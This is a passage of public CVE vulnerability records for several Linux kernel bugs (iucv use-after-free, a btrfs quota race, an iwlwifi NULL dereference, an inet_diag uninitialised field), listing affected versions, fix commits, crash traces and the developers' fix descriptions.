"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/iucv: fix use after free in iucv_sock_close()\n\niucv_sever_path() is called from process context and from bh context.\niucv-\u003epath is used as indicator whether somebody else is taking care of\nsevering the path (or it is already removed / never existed).\nThis needs to be done with atomic compare and swap, otherwise there is a\nsmall window where iucv_sock_close() will try to work with a path that has\nalready been severed and freed by iucv_callback_connrej() called by\niucv_tasklet_fn().\n\nExample:\n[452744.123844] Call Trace:\n[452744.123845] ([\u003c0000001e87f03880\u003e] 0x1e87f03880)\n[452744.123966] [\u003c00000000d593001e\u003e] iucv_path_sever+0x96/0x138\n[452744.124330] [\u003c000003ff801ddbca\u003e] iucv_sever_path+0xc2/0xd0 [af_iucv]\n[452744.124336] [\u003c000003ff801e01b6\u003e] iucv_sock_close+0xa6/0x310 [af_iucv]\n[452744.124341] [\u003c000003ff801e08cc\u003e] iucv_sock_release+0x3c/0xd0 [af_iucv]\n[452744.124345] [\u003c00000000d574794e\u003e] __sock_release+0x5e/0xe8\n[452744.124815] [\u003c00000000d5747a0c\u003e] sock_close+0x34/0x48\n[452744.124820] [\u003c00000000d5421642\u003e] __fput+0xba/0x268\n[452744.124826] [\u003c00000000d51b382c\u003e] task_work_run+0xbc/0xf0\n[452744.124832] [\u003c00000000d5145710\u003e] do_notify_resume+0x88/0x90\n[452744.124841] [\u003c00000000d5978096\u003e] system_call+0xe2/0x2c8\n[452744.125319] Last Breaking-Event-Address:\n[452744.125321] [\u003c00000000d5930018\u003e] iucv_path_sever+0x90/0x138\n[452744.125324]\n[452744.125325] Kernel panic - not syncing: Fatal exception in interrupt\n\nNote that bh_lock_sock() is not serializing the tasklet context against\nprocess context, because the check for sock_owned_by_user() and\ncorresponding handling is missing.\n\nIdeas for a future clean-up patch:\nA) Correct usage of bh_lock_sock() in tasklet context, as described in\nRe-enqueue, if needed. This may require adding return values to the\ntasklet functions and thus changes to all users of iucv.\n\nB) Change iucv tasklet into worker and use only lock_sock() in af_iucv."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:37.701Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/84f40b46787ecb67c7ad08a5bb1376141fa10c01"
},
{
"url": "https://git.kernel.org/stable/c/37652fbef9809411cea55ea5fa1a170e299efcd0"
},
{
"url": "https://git.kernel.org/stable/c/c65f72eec60a34ace031426e04e9aff8e5f04895"
},
{
"url": "https://git.kernel.org/stable/c/ac758e1f663fe9bc64f6b47212a2aa18697524f5"
},
{
"url": "https://git.kernel.org/stable/c/8b424c9e44111c5a76f41c6b741f8d4c4179d876"
},
{
"url": "https://git.kernel.org/stable/c/01437282fd3904810603f3dc98d2cac6b8b6fc84"
},
{
"url": "https://git.kernel.org/stable/c/69620522c48ce8215e5eb55ffbab8cafee8f407d"
},
{
"url": "https://git.kernel.org/stable/c/f558120cd709682b739207b48cf7479fd9568431"
}
],
"title": "net/iucv: fix use after free in iucv_sock_close()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42271",
"datePublished": "2024-08-17T08:54:26.048Z",
"dateReserved": "2024-07-30T07:40:12.260Z",
"dateUpdated": "2025-05-04T09:25:37.701Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52896 (GCVE-0-2023-52896)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix race between quota rescan and disable leading to NULL pointer deref
If we have one task trying to start the quota rescan worker while another
one is trying to disable quotas, we can end up hitting a race that results
in the quota rescan worker doing a NULL pointer dereference. The steps for
this are the following:
1) Quotas are enabled;
2) Task A calls the quota rescan ioctl and enters btrfs_qgroup_rescan().
It calls qgroup_rescan_init() which returns 0 (success) and then joins a
transaction and commits it;
3) Task B calls the quota disable ioctl and enters btrfs_quota_disable().
It clears the bit BTRFS_FS_QUOTA_ENABLED from fs_info->flags and calls
btrfs_qgroup_wait_for_completion(), which returns immediately since the
rescan worker is not yet running.
Then it starts a transaction and locks fs_info->qgroup_ioctl_lock;
4) Task A queues the rescan worker, by calling btrfs_queue_work();
5) The rescan worker starts, and calls rescan_should_stop() at the start
of its while loop, which results in 0 iterations of the loop, since
the flag BTRFS_FS_QUOTA_ENABLED was cleared from fs_info->flags by
task B at step 3);
6) Task B sets fs_info->quota_root to NULL;
7) The rescan worker tries to start a transaction and uses
fs_info->quota_root as the root argument for btrfs_start_transaction().
This results in a NULL pointer dereference down the call chain of
btrfs_start_transaction(). The stack trace is something like the one
reported in Link tag below:
general protection fault, probably for non-canonical address 0xdffffc0000000041: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000208-0x000000000000020f]
CPU: 1 PID: 34 Comm: kworker/u4:2 Not tainted 6.1.0-syzkaller-13872-gb6bb9676f216 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/26/2022
Workqueue: btrfs-qgroup-rescan btrfs_work_helper
RIP: 0010:start_transaction+0x48/0x10f0 fs/btrfs/transaction.c:564
Code: 48 89 fb 48 (...)
RSP: 0018:ffffc90000ab7ab0 EFLAGS: 00010206
RAX: 0000000000000041 RBX: 0000000000000208 RCX: ffff88801779ba80
RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
RBP: dffffc0000000000 R08: 0000000000000001 R09: fffff52000156f5d
R10: fffff52000156f5d R11: 1ffff92000156f5c R12: 0000000000000000
R13: 0000000000000001 R14: 0000000000000001 R15: 0000000000000003
FS: 0000000000000000(0000) GS:ffff8880b9900000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f2bea75b718 CR3: 000000001d0cc000 CR4: 00000000003506e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
btrfs_qgroup_rescan_worker+0x3bb/0x6a0 fs/btrfs/qgroup.c:3402
btrfs_work_helper+0x312/0x850 fs/btrfs/async-thread.c:280
process_one_work+0x877/0xdb0 kernel/workqueue.c:2289
worker_thread+0xb14/0x1330 kernel/workqueue.c:2436
kthread+0x266/0x300 kernel/kthread.c:376
ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:308
</TASK>
Modules linked in:
So fix this by having the rescan worker function not attempt to start a
transaction if it didn't do any rescan work.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 26b3901d20bf9da2c6a00cb1fb48932166f80a45 Version: 32747e01436aac8ef93fe85b5b523b4f3b52f040 Version: 89d4cca583fc9594ee7d1a0bc986886d6fb587e6 Version: e804861bd4e69cc5fe1053eedcb024982dde8e48 Version: e804861bd4e69cc5fe1053eedcb024982dde8e48 Version: 31198e58c09e21d4f65c49d2361f76b87aca4c3f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52896",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:43.723269Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:13.066Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/btrfs/qgroup.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "89ac597e3e807b91e2ebd6a7c36fec7b97290233",
"status": "affected",
"version": "26b3901d20bf9da2c6a00cb1fb48932166f80a45",
"versionType": "git"
},
{
"lessThan": "3bd43374857103ba3cac751d6d4afa8d83b5d92a",
"status": "affected",
"version": "32747e01436aac8ef93fe85b5b523b4f3b52f040",
"versionType": "git"
},
{
"lessThan": "64287cd456a22373053998c1fccf14b651e9cbbd",
"status": "affected",
"version": "89d4cca583fc9594ee7d1a0bc986886d6fb587e6",
"versionType": "git"
},
{
"lessThan": "1004fc90f0d79a4b7d9e3d432729914f472f9ad1",
"status": "affected",
"version": "e804861bd4e69cc5fe1053eedcb024982dde8e48",
"versionType": "git"
},
{
"lessThan": "b7adbf9ada3513d2092362c8eac5cddc5b651f5c",
"status": "affected",
"version": "e804861bd4e69cc5fe1053eedcb024982dde8e48",
"versionType": "git"
},
{
"status": "affected",
"version": "31198e58c09e21d4f65c49d2361f76b87aca4c3f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/qgroup.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "5.4.178",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "5.10.99",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.15.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.16.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race between quota rescan and disable leading to NULL pointer deref\n\nIf we have one task trying to start the quota rescan worker while another\none is trying to disable quotas, we can end up hitting a race that results\nin the quota rescan worker doing a NULL pointer dereference. The steps for\nthis are the following:\n\n1) Quotas are enabled;\n\n2) Task A calls the quota rescan ioctl and enters btrfs_qgroup_rescan().\n It calls qgroup_rescan_init() which returns 0 (success) and then joins a\n transaction and commits it;\n\n3) Task B calls the quota disable ioctl and enters btrfs_quota_disable().\n It clears the bit BTRFS_FS_QUOTA_ENABLED from fs_info-\u003eflags and calls\n btrfs_qgroup_wait_for_completion(), which returns immediately since the\n rescan worker is not yet running.\n Then it starts a transaction and locks fs_info-\u003eqgroup_ioctl_lock;\n\n4) Task A queues the rescan worker, by calling btrfs_queue_work();\n\n5) The rescan worker starts, and calls rescan_should_stop() at the start\n of its while loop, which results in 0 iterations of the loop, since\n the flag BTRFS_FS_QUOTA_ENABLED was cleared from fs_info-\u003eflags by\n task B at step 3);\n\n6) Task B sets fs_info-\u003equota_root to NULL;\n\n7) The rescan worker tries to start a transaction and uses\n fs_info-\u003equota_root as the root argument for btrfs_start_transaction().\n This results in a NULL pointer dereference down the call chain of\n btrfs_start_transaction(). The stack trace is something like the one\n reported in Link tag below:\n\n general protection fault, probably for non-canonical address 0xdffffc0000000041: 0000 [#1] PREEMPT SMP KASAN\n KASAN: null-ptr-deref in range [0x0000000000000208-0x000000000000020f]\n CPU: 1 PID: 34 Comm: kworker/u4:2 Not tainted 6.1.0-syzkaller-13872-gb6bb9676f216 #0\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/26/2022\n Workqueue: btrfs-qgroup-rescan btrfs_work_helper\n RIP: 0010:start_transaction+0x48/0x10f0 fs/btrfs/transaction.c:564\n Code: 48 89 fb 48 (...)\n RSP: 0018:ffffc90000ab7ab0 EFLAGS: 00010206\n RAX: 0000000000000041 RBX: 0000000000000208 RCX: ffff88801779ba80\n RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\n RBP: dffffc0000000000 R08: 0000000000000001 R09: fffff52000156f5d\n R10: fffff52000156f5d R11: 1ffff92000156f5c R12: 0000000000000000\n R13: 0000000000000001 R14: 0000000000000001 R15: 0000000000000003\n FS: 0000000000000000(0000) GS:ffff8880b9900000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f2bea75b718 CR3: 000000001d0cc000 CR4: 00000000003506e0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n btrfs_qgroup_rescan_worker+0x3bb/0x6a0 fs/btrfs/qgroup.c:3402\n btrfs_work_helper+0x312/0x850 fs/btrfs/async-thread.c:280\n process_one_work+0x877/0xdb0 kernel/workqueue.c:2289\n worker_thread+0xb14/0x1330 kernel/workqueue.c:2436\n kthread+0x266/0x300 kernel/kthread.c:376\n ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:308\n \u003c/TASK\u003e\n Modules linked in:\n\nSo fix this by having the rescan worker function not attempt to start a\ntransaction if it didn\u0027t do any rescan work."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:48.581Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/89ac597e3e807b91e2ebd6a7c36fec7b97290233"
},
{
"url": "https://git.kernel.org/stable/c/3bd43374857103ba3cac751d6d4afa8d83b5d92a"
},
{
"url": "https://git.kernel.org/stable/c/64287cd456a22373053998c1fccf14b651e9cbbd"
},
{
"url": "https://git.kernel.org/stable/c/1004fc90f0d79a4b7d9e3d432729914f472f9ad1"
},
{
"url": "https://git.kernel.org/stable/c/b7adbf9ada3513d2092362c8eac5cddc5b651f5c"
}
],
"title": "btrfs: fix race between quota rescan and disable leading to NULL pointer deref",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52896",
"datePublished": "2024-08-21T06:10:36.233Z",
"dateReserved": "2024-08-21T06:07:11.014Z",
"dateUpdated": "2025-05-04T12:49:48.581Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48918 (GCVE-0-2022-48918)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iwlwifi: mvm: check debugfs_dir ptr before use
When "debugfs=off" is used on the kernel command line, iwiwifi's
mvm module uses an invalid/unchecked debugfs_dir pointer and causes
a BUG:
BUG: kernel NULL pointer dereference, address: 000000000000004f
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP
CPU: 1 PID: 503 Comm: modprobe Tainted: G W 5.17.0-rc5 #7
Hardware name: Dell Inc. Inspiron 15 5510/076F7Y, BIOS 2.4.1 11/05/2021
RIP: 0010:iwl_mvm_dbgfs_register+0x692/0x700 [iwlmvm]
Code: 69 a0 be 80 01 00 00 48 c7 c7 50 73 6a a0 e8 95 cf ee e0 48 8b 83 b0 1e 00 00 48 c7 c2 54 73 6a a0 be 64 00 00 00 48 8d 7d 8c <48> 8b 48 50 e8 15 22 07 e1 48 8b 43 28 48 8d 55 8c 48 c7 c7 5f 73
RSP: 0018:ffffc90000a0ba68 EFLAGS: 00010246
RAX: ffffffffffffffff RBX: ffff88817d6e3328 RCX: ffff88817d6e3328
RDX: ffffffffa06a7354 RSI: 0000000000000064 RDI: ffffc90000a0ba6c
RBP: ffffc90000a0bae0 R08: ffffffff824e4880 R09: ffffffffa069d620
R10: ffffc90000a0ba00 R11: ffffffffffffffff R12: 0000000000000000
R13: ffffc90000a0bb28 R14: ffff88817d6e3328 R15: ffff88817d6e3320
FS: 00007f64dd92d740(0000) GS:ffff88847f640000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000000000004f CR3: 000000016fc79001 CR4: 0000000000770ee0
PKRU: 55555554
Call Trace:
<TASK>
? iwl_mvm_mac_setup_register+0xbdc/0xda0 [iwlmvm]
iwl_mvm_start_post_nvm+0x71/0x100 [iwlmvm]
iwl_op_mode_mvm_start+0xab8/0xb30 [iwlmvm]
_iwl_op_mode_start+0x6f/0xd0 [iwlwifi]
iwl_opmode_register+0x6a/0xe0 [iwlwifi]
? 0xffffffffa0231000
iwl_mvm_init+0x35/0x1000 [iwlmvm]
? 0xffffffffa0231000
do_one_initcall+0x5a/0x1b0
? kmem_cache_alloc+0x1e5/0x2f0
? do_init_module+0x1e/0x220
do_init_module+0x48/0x220
load_module+0x2602/0x2bc0
? __kernel_read+0x145/0x2e0
? kernel_read_file+0x229/0x290
__do_sys_finit_module+0xc5/0x130
? __do_sys_finit_module+0xc5/0x130
__x64_sys_finit_module+0x13/0x20
do_syscall_64+0x38/0x90
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f64dda564dd
Code: 5b 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 1b 29 0f 00 f7 d8 64 89 01 48
RSP: 002b:00007ffdba393f88 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f64dda564dd
RDX: 0000000000000000 RSI: 00005575399e2ab2 RDI: 0000000000000001
RBP: 000055753a91c5e0 R08: 0000000000000000 R09: 0000000000000002
R10: 0000000000000001 R11: 0000000000000246 R12: 00005575399e2ab2
R13: 000055753a91ceb0 R14: 0000000000000000 R15: 000055753a923018
</TASK>
Modules linked in: btintel(+) btmtk bluetooth vfat snd_hda_codec_hdmi fat snd_hda_codec_realtek snd_hda_codec_generic iwlmvm(+) snd_sof_pci_intel_tgl mac80211 snd_sof_intel_hda_common soundwire_intel soundwire_generic_allocation soundwire_cadence soundwire_bus snd_sof_intel_hda snd_sof_pci snd_sof snd_sof_xtensa_dsp snd_soc_hdac_hda snd_hda_ext_core snd_soc_acpi_intel_match snd_soc_acpi snd_soc_core btrfs snd_compress snd_hda_intel snd_intel_dspcfg snd_intel_sdw_acpi snd_hda_codec raid6_pq iwlwifi snd_hda_core snd_pcm snd_timer snd soundcore cfg80211 intel_ish_ipc(+) thunderbolt rfkill intel_ishtp ucsi_acpi wmi i2c_hid_acpi i2c_hid evdev
CR2: 000000000000004f
---[ end trace 0000000000000000 ]---
Check the debugfs_dir pointer for an error before using it.
[change to make both conditional]
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48918",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:38.078569Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:01.314Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7de1ed755e1ace30d97a724bad32452ed86b653b",
"status": "affected",
"version": "8c082a99edb997d7999eb7cdb648e47a2bf4a638",
"versionType": "git"
},
{
"lessThan": "fe51975ff13831e794e1bcd0039b305dcad3d7ba",
"status": "affected",
"version": "8c082a99edb997d7999eb7cdb648e47a2bf4a638",
"versionType": "git"
},
{
"lessThan": "5a6248c0a22352f09ea041665d3bd3e18f6f872c",
"status": "affected",
"version": "8c082a99edb997d7999eb7cdb648e47a2bf4a638",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/intel/iwlwifi/mvm/debugfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niwlwifi: mvm: check debugfs_dir ptr before use\n\nWhen \"debugfs=off\" is used on the kernel command line, iwiwifi\u0027s\nmvm module uses an invalid/unchecked debugfs_dir pointer and causes\na BUG:\n\n BUG: kernel NULL pointer dereference, address: 000000000000004f\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] PREEMPT SMP\n CPU: 1 PID: 503 Comm: modprobe Tainted: G W 5.17.0-rc5 #7\n Hardware name: Dell Inc. Inspiron 15 5510/076F7Y, BIOS 2.4.1 11/05/2021\n RIP: 0010:iwl_mvm_dbgfs_register+0x692/0x700 [iwlmvm]\n Code: 69 a0 be 80 01 00 00 48 c7 c7 50 73 6a a0 e8 95 cf ee e0 48 8b 83 b0 1e 00 00 48 c7 c2 54 73 6a a0 be 64 00 00 00 48 8d 7d 8c \u003c48\u003e 8b 48 50 e8 15 22 07 e1 48 8b 43 28 48 8d 55 8c 48 c7 c7 5f 73\n RSP: 0018:ffffc90000a0ba68 EFLAGS: 00010246\n RAX: ffffffffffffffff RBX: ffff88817d6e3328 RCX: ffff88817d6e3328\n RDX: ffffffffa06a7354 RSI: 0000000000000064 RDI: ffffc90000a0ba6c\n RBP: ffffc90000a0bae0 R08: ffffffff824e4880 R09: ffffffffa069d620\n R10: ffffc90000a0ba00 R11: ffffffffffffffff R12: 0000000000000000\n R13: ffffc90000a0bb28 R14: ffff88817d6e3328 R15: ffff88817d6e3320\n FS: 00007f64dd92d740(0000) GS:ffff88847f640000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 000000000000004f CR3: 000000016fc79001 CR4: 0000000000770ee0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n ? iwl_mvm_mac_setup_register+0xbdc/0xda0 [iwlmvm]\n iwl_mvm_start_post_nvm+0x71/0x100 [iwlmvm]\n iwl_op_mode_mvm_start+0xab8/0xb30 [iwlmvm]\n _iwl_op_mode_start+0x6f/0xd0 [iwlwifi]\n iwl_opmode_register+0x6a/0xe0 [iwlwifi]\n ? 0xffffffffa0231000\n iwl_mvm_init+0x35/0x1000 [iwlmvm]\n ? 0xffffffffa0231000\n do_one_initcall+0x5a/0x1b0\n ? kmem_cache_alloc+0x1e5/0x2f0\n ? do_init_module+0x1e/0x220\n do_init_module+0x48/0x220\n load_module+0x2602/0x2bc0\n ? __kernel_read+0x145/0x2e0\n ? kernel_read_file+0x229/0x290\n __do_sys_finit_module+0xc5/0x130\n ? __do_sys_finit_module+0xc5/0x130\n __x64_sys_finit_module+0x13/0x20\n do_syscall_64+0x38/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n RIP: 0033:0x7f64dda564dd\n Code: 5b 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d 1b 29 0f 00 f7 d8 64 89 01 48\n RSP: 002b:00007ffdba393f88 EFLAGS: 00000246 ORIG_RAX: 0000000000000139\n RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f64dda564dd\n RDX: 0000000000000000 RSI: 00005575399e2ab2 RDI: 0000000000000001\n RBP: 000055753a91c5e0 R08: 0000000000000000 R09: 0000000000000002\n R10: 0000000000000001 R11: 0000000000000246 R12: 00005575399e2ab2\n R13: 000055753a91ceb0 R14: 0000000000000000 R15: 000055753a923018\n \u003c/TASK\u003e\n Modules linked in: btintel(+) btmtk bluetooth vfat snd_hda_codec_hdmi fat snd_hda_codec_realtek snd_hda_codec_generic iwlmvm(+) snd_sof_pci_intel_tgl mac80211 snd_sof_intel_hda_common soundwire_intel soundwire_generic_allocation soundwire_cadence soundwire_bus snd_sof_intel_hda snd_sof_pci snd_sof snd_sof_xtensa_dsp snd_soc_hdac_hda snd_hda_ext_core snd_soc_acpi_intel_match snd_soc_acpi snd_soc_core btrfs snd_compress snd_hda_intel snd_intel_dspcfg snd_intel_sdw_acpi snd_hda_codec raid6_pq iwlwifi snd_hda_core snd_pcm snd_timer snd soundcore cfg80211 intel_ish_ipc(+) thunderbolt rfkill intel_ishtp ucsi_acpi wmi i2c_hid_acpi i2c_hid evdev\n CR2: 000000000000004f\n ---[ end trace 0000000000000000 ]---\n\nCheck the debugfs_dir pointer for an error before using it.\n\n[change to make both conditional]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:05.222Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7de1ed755e1ace30d97a724bad32452ed86b653b"
},
{
"url": "https://git.kernel.org/stable/c/fe51975ff13831e794e1bcd0039b305dcad3d7ba"
},
{
"url": "https://git.kernel.org/stable/c/5a6248c0a22352f09ea041665d3bd3e18f6f872c"
}
],
"title": "iwlwifi: mvm: check debugfs_dir ptr before use",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48918",
"datePublished": "2024-08-22T01:32:33.271Z",
"dateReserved": "2024-08-21T06:06:23.295Z",
"dateUpdated": "2025-05-04T08:26:05.222Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42106 (GCVE-0-2024-42106)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
inet_diag: Initialize pad field in struct inet_diag_req_v2
KMSAN reported uninit-value access in raw_lookup() [1]. Diag for raw
sockets uses the pad field in struct inet_diag_req_v2 for the
underlying protocol. This field corresponds to the sdiag_raw_protocol
field in struct inet_diag_req_raw.
inet_diag_get_exact_compat() converts inet_diag_req to
inet_diag_req_v2, but leaves the pad field uninitialized. So the issue
occurs when raw_lookup() accesses the sdiag_raw_protocol field.
Fix this by initializing the pad field in
inet_diag_get_exact_compat(). Also, do the same fix in
inet_diag_dump_compat() to avoid the similar issue in the future.
[1]
